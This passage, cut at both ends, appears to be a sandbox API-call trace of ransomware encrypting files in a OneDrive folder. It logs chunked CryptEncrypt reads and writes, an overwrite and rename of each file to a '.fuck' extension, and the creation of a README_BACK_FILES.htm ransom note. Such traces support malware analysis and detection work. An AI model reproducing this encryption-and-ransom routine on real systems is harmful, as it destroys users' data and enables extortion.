lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.528] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.528] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.528] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.529] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.529] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.529] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.529] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.529] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.529] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.530] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.530] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.530] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.530] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.530] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.530] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.531] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.531] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.531] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.531] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.531] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.535] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.536] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.536] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.536] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.536] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.536] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.537] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.537] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.537] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.537] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.537] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.537] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.538] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.538] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.538] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.538] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.538] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.538] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0281.538] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0281.538] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0281.538] CloseHandle (hObject=0x5d4c) returned 1 [0281.538] CloseHandle (hObject=0x5d80) returned 1 [0281.538] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.544] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.545] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.555] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.557] CryptDestroyHash (hHash=0x2fa748) returned 1 [0281.557] CryptDestroyKey (hKey=0x2fc5c8) returned 1 [0281.557] CryptReleaseContext (hProv=0x2f1ee60, dwFlags=0x0) returned 1 [0281.557] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.557] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0281.557] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\readme_back_files.htm")) returned 0xffffffff [0281.557] AreFileApisANSI () returned 1 [0281.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0281.557] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.558] GetFileType (hFile=0x5d3c) returned 0x1 [0281.559] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.560] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: 